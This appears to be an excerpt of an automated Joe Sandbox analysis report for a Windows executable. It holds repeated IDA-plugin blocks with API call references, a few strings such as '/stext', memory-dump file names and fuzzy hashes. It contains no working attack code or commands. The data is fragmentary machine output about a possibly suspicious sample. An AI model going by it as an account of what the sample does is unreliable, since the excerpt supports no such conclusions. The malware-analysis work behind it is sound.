                                                                    • GetLastError.KERNEL32 ref: 004175A8
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$FilePointer
                                                                    • String ID:
                                                                    • API String ID: 1156039329-0
                                                                    • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                    • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                    • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                    • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                    • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                    • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: File$ChangeCloseCreateFindNotificationTime
                                                                    • String ID:
                                                                    • API String ID: 1631957507-0
                                                                    • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                    • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                    • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                    • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                    APIs
                                                                    • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                    • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: Temp$DirectoryFileNamePathWindows
                                                                    • String ID:
                                                                    • API String ID: 1125800050-0
                                                                    • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                    • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                    • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                    • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: d
                                                                    • API String ID: 0-2564639436
                                                                    • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                    • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                    • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                    • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: memset
                                                                    • String ID: BINARY
                                                                    • API String ID: 2221118986-907554435
                                                                    • Opcode ID: bc3d19a7d02c8d15955695c672ee8877c8483ff31dc40855ee5cfcc836beaa69
                                                                    • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                    • Opcode Fuzzy Hash: bc3d19a7d02c8d15955695c672ee8877c8483ff31dc40855ee5cfcc836beaa69
                                                                    • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                    APIs
                                                                      • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                      • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                                    • GetStdHandle.KERNEL32(000000F5,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410530
                                                                    • FindCloseChangeNotification.KERNELBASE(00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410654
                                                                      • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                      • Part of subcall function 0040973C: GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                      • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                      • Part of subcall function 0040973C: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                                                                    • String ID:
                                                                    • API String ID: 1161345128-0
                                                                    • Opcode ID: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                                    • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                    • Opcode Fuzzy Hash: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                                    • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsicmp
                                                                    • String ID: /stext
                                                                    • API String ID: 2081463915-3817206916
                                                                    • Opcode ID: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                                    • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                    • Opcode Fuzzy Hash: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                                    • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsicmp
                                                                    • String ID: .#v
                                                                    • API String ID: 2081463915-507759092
                                                                    • Opcode ID: cbddd43e50b6ded4d98ad0d82dd6b3ceb41ab08d79f44c56bc7594620457dfc9
                                                                    • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                    • Opcode Fuzzy Hash: cbddd43e50b6ded4d98ad0d82dd6b3ceb41ab08d79f44c56bc7594620457dfc9
                                                                    • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                    APIs
                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                    • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                      • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                      • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                    • FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                      • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
                                                                    • String ID:
                                                                    • API String ID: 159017214-0
                                                                    • Opcode ID: bdc6ff89a6972445fbf15f1c87a3cbc7fe705fee6098557394266cd6fc52cd88
                                                                    • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                    • Opcode Fuzzy Hash: bdc6ff89a6972445fbf15f1c87a3cbc7fe705fee6098557394266cd6fc52cd88
                                                                    • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                    APIs
                                                                    Strings
                                                                    • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: malloc
                                                                    • String ID: failed to allocate %u bytes of memory
                                                                    • API String ID: 2803490479-1168259600
                                                                    • Opcode ID: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                                                    • Instruction ID: 0aa28a7b77b2060330bf56ee6aba3953d7f003d38adef6953018dc3bb0cf108c
                                                                    • Opcode Fuzzy Hash: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                                                    • Instruction Fuzzy Hash: 0FE026B7F01A12A3C200561AFD01AC677919FC132572B013BF92CD36C1E638D896C7A9
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@
                                                                    • String ID:
                                                                    • API String ID: 613200358-0
                                                                    • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                    • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                    • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                    • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: memcmpmemset
                                                                    • String ID:
                                                                    • API String ID: 1065087418-0
                                                                    • Opcode ID: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                                    • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                    • Opcode Fuzzy Hash: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                                    • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                    APIs
                                                                      • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                      • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                      • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                      • Part of subcall function 0040A02C: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                    • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: File$Time$ChangeCloseCompareCreateFindNotificationmemset
                                                                    • String ID:
                                                                    • API String ID: 1481295809-0
                                                                    • Opcode ID: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                                    • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                    • Opcode Fuzzy Hash: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                                    • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                    APIs
                                                                      • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                    • String ID:
                                                                    • API String ID: 3150196962-0
                                                                    • Opcode ID: be26bcaf2987f4035eeff70895753d9ab226293c41c78703657a1ba2214892b4
                                                                    • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                    • Opcode Fuzzy Hash: be26bcaf2987f4035eeff70895753d9ab226293c41c78703657a1ba2214892b4
                                                                    • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                    APIs
                                                                    • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: File$PointerRead
                                                                    • String ID:
                                                                    • API String ID: 3154509469-0
                                                                    • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                    • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                    • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                    • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                    APIs
                                                                    • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                      • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                      • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                      • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfile$StringWrite_itowmemset
                                                                    • String ID:
                                                                    • API String ID: 4232544981-0
                                                                    • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                    • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                    • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                    • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                    APIs
                                                                    • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: FreeLibrary
                                                                    • String ID:
                                                                    • API String ID: 3664257935-0
                                                                    • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                    • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                    • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                    • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                    APIs
                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                    • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$FileModuleName
                                                                    • String ID:
                                                                    • API String ID: 3859505661-0
                                                                    • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                    • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                    • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                    • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                    APIs
                                                                    • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                    Memory Dump Source
